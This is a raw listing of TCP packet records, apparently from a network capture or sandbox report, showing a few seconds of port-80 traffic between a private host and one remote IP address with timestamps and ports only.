Apr 7, 2025 08:37:06.699204922 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699245930 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699316025 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699419975 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699482918 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699512005 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699533939 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699583054 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699599981 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699623108 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699702024 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699759007 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699774027 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699804068 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699810982 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699917078 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699943066 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699963093 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.699970961 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.699990988 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700009108 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700026989 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.700052977 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.700150013 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700172901 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700201035 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700226068 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.700282097 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700339079 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.700362921 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700429916 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700457096 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700500011 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.700512886 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.700560093 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:06.743624926 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.743693113 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:06.743778944 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.036315918 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.036343098 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.036452055 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.036536932 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.036617041 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.036761045 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.044769049 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.044795036 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.044812918 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.044894934 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.044914961 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.044996977 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045092106 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045119047 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045144081 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045166969 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045170069 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045221090 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045228004 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045253038 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045269966 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045288086 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045298100 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045315981 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045348883 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045367002 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045389891 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045420885 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045651913 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045702934 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045811892 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045835972 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045860052 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045881987 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045892000 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045907974 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045913935 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045933962 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045948982 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045958996 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.045974016 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.045999050 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.046004057 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.046029091 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.046030045 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.046050072 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.046061039 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.046077967 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.046087980 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.046103001 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.046128988 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.378650904 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.378737926 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.378964901 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.378985882 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.379023075 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.379028082 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.379074097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.379074097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385099888 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385118961 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385149002 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385179043 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385199070 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385479927 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385709047 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385732889 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385749102 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385783911 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385791063 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385791063 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385806084 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385827065 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385827065 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385834932 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385855913 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385862112 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385885954 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385890961 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.385910034 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385934114 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385956049 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385977983 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.385996103 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.386030912 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.386351109 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.386372089 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.386399031 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.386406898 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.386441946 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.386441946 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.386801004 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.386883020 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.718687057 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.718951941 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.724459887 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.724483967 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.724510908 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.724539995 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.724539995 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.724601030 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.728638887 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.728740931 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.728768110 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.728795052 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.728825092 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.728837967 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.728863001 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.728904963 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.728905916 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.728956938 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.728979111 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.729005098 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.729027987 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.729048014 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.729074955 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.729083061 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.729083061 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.729118109 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.729165077 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:07.729301929 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:07.729357958 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069185972 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069226980 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069253922 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069281101 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069281101 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069305897 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069325924 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069348097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069360971 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069384098 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069406033 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069427013 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069427013 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069484949 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069504023 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069534063 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069554090 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069570065 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069581985 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069596052 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069645882 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069757938 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069786072 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069808006 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069830894 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.069837093 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.069907904 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409116983 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409161091 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409182072 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409209013 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409214020 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409261942 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409310102 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409327984 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409378052 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409379959 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409404993 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409426928 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409449100 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409451962 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409499884 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409501076 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409542084 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409558058 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409590960 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409616947 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409641027 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409662962 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409665108 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409701109 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409709930 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.409734011 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409758091 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.409780025 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.462708950 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.750585079 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.750636101 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.750667095 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.750690937 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.750744104 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751044989 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751070023 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751082897 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751117945 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751203060 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751228094 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751251936 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751274109 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751282930 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751297951 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751322031 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751327991 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751352072 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751375914 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751377106 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751400948 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751421928 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751432896 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751457930 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751480103 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.751498938 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751523972 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.751552105 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:08.802073956 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:08.802143097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.090269089 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.090316057 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.090373039 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.091787100 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.091857910 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.091882944 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.091905117 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.091908932 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.091949940 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.092315912 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092338085 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092386007 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.092528105 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092576027 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092598915 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092622995 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092631102 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.092654943 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092670918 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.092680931 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092705011 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092725039 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.092751980 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092776060 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092801094 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.092803001 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.092845917 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.092874050 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.134737015 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.141526937 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.141545057 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.141607046 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.433953047 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.433999062 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434024096 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434048891 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434062958 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434087038 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434106112 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434113979 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434139967 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434159994 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434170008 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434202909 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434237957 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434406996 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434427977 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434456110 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434458017 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434479952 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434500933 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434505939 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434529066 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434545040 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434562922 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434607983 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434639931 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434730053 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.434777021 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.434824944 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.475003958 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.475068092 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.482779026 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.482913017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.482960939 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.774139881 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774161100 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774280071 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.774411917 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774427891 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774449110 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774533033 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.774617910 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774630070 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774647951 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774678946 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.774709940 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.774781942 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774795055 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774815083 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774842024 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.774903059 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774951935 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.774981022 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.774992943 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.775012970 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.775023937 CEST	80	49691	161.248.239.119	192.168.2.5
